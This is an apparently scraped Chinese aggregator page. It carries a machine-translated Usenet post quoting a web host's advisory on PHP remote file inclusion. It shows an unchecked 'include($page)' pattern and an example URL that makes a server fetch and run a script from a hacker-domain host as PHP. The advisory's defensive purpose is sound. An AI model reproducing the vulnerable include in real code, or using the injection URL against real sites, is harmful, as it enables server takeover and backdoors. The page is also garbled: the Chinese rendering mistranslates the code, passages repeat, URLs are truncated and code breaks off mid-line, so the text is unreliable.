PHP因安全问题而受到指责 [英] PHP blamed for security problems
问题描述
这就是今天早上的安全建议在这里读到的:
``在过去的3个月里,我们注意到
网络服务器攻击和我们网络上的成功妥协。这些是主要的PHP脚本攻击,并且让黑客可以轻松访问
虚拟服务器,如新闻中的PHP安全通报中提到的那样
$ b控制中心的$ b部分。除了告知我们的客户保持警惕以及每当有新版本可用时升级PHP脚本软件时,我们真的无法对这些网络攻击做多少工作。
allow_url_open对PHP的更改大约和我们在这里做的一样多。''''
他们提供了更详细的问题描述:
``最近,我们看到我们的服务器上的恶意活动增加了,这是因为黑客成功获得了b
shell访问权限通过不安全的PHP脚本。
在我们对这些被黑客入侵的账户进行调查后,我们认为我们已经建立了
这些攻击。
您可能知道,PHP为打开文件提供了许多功能,例如''fopen() ''并且还有可能
将HTTP或FTP URL传递给这些,以便
fopen('''http://www.dsvr.co .UK /);将获取用于PHP的DSVR主页的内容
作为文件处理。
您可能不知道的是诸如
include()也允许将URL作为参数传递。
因为这些函数导致包含的文件被解析
并作为PHP代码执行这可能是一个主要的安全漏洞。
许多客户似乎都在使用这样的PHP:
< html>
...标准标题......
<?包括:($页); ?>
...标准页脚...
< / html>
作为一种廉价的管理方式常见的页眉和页脚。这些
页面可以这样访问:
http://www.your-domain.co.uk/index.php?page=about.inc
这样一个文件''about.inc''包含在标准
页眉/页脚内。
但是,除非$ page变量检查有效
内容 - 并且我们遇到的许多PHP脚本中显然缺少输入完整性检查
- 这是非常开放的
滥用。恶意第三方可以执行以下操作:
http://www.your-domain.co.uk/index.p...oot-script.txt
这个例子会导致
http://www.hacker-domain.co.uk/my-root-script.txt
下载并执行为PHP,允许黑客操作服务器文件并创建后门,允许
他们使用telnet或ssh登录并导致进一步
中断。''''
-
__________
| im | yler http://timtyler.org/ ti*@tt1lock.org 删除锁定回复。
page); ?>
...标准页脚...
< / html>
作为一种廉价的管理方式常见的页眉和页脚。这些
页面可以这样访问:
http://www.your-domain.co.uk/index.php?page=about.inc
所以文件''about.inc''包含在标准
页眉/页脚内。
但是,除非
检查页面变量是否有效
内容 - 并且在我们遇到的许多PHP脚本中显然缺少输入完整性检查
- 这是非常开放
误用。恶意第三方可以执行以下操作:
http://www.your-domain.co.uk/index.p...oot-script.txt
这个例子会导致
http://www.hacker-domain.co.uk/my-root-script.txt
下载并执行为PHP,允许黑客操作服务器文件并创建后门,允许
他们使用telnet或ssh登录并导致进一步
中断。''''
-
__________
| im | yler http://timtyler.org/ ti*@tt1lock.org 删除锁定回复。
>许多客户似乎使用的PHP看起来像这样:
< html>
...标准标题......
<?包括(
Here''s what this morning''s security advisory read here:
``In the last 3 months we have noticed an marked increase in the number of
web-server attacks and successful compromise on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_open change to PHP is about as much as we can do here.''''
They offer a more detailed description of the problem:
``Recently, we''ve seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.
Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.
As you may be aware, PHP provides a number of functions for
opening files such as ''fopen()'' and it''s also possible to
pass an HTTP or FTP URL to these such that
fopen(''http://www.dsvr.co.uk/''); will fetch the contents of
the DSVR homepage for PHP to treat as a file.
What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.
Many clients seem to be using PHP that looks like this:
<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>
as a cheap way to manage common headers and footers. These
pages can be accessed like so:
http://www.your-domain.co.uk/index.php?page=about.inc
so that a file ''about.inc'' is included inside the standard
header/footer.
However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:
http://www.your-domain.co.uk/index.p...oot-script.txt
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.解决方案page); ?>
...standard footer...
</html>
as a cheap way to manage common headers and footers. These
pages can be accessed like so:
http://www.your-domain.co.uk/index.php?page=about.inc
so that a file ''about.inc'' is included inside the standard
header/footer.
However, unless the
page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:
http://www.your-domain.co.uk/index.p...oot-script.txt
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
> Many clients seem to be using PHP that looks like this:
<html>
...standard header...
<? include(
这篇关于PHP因安全问题而受到指责的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
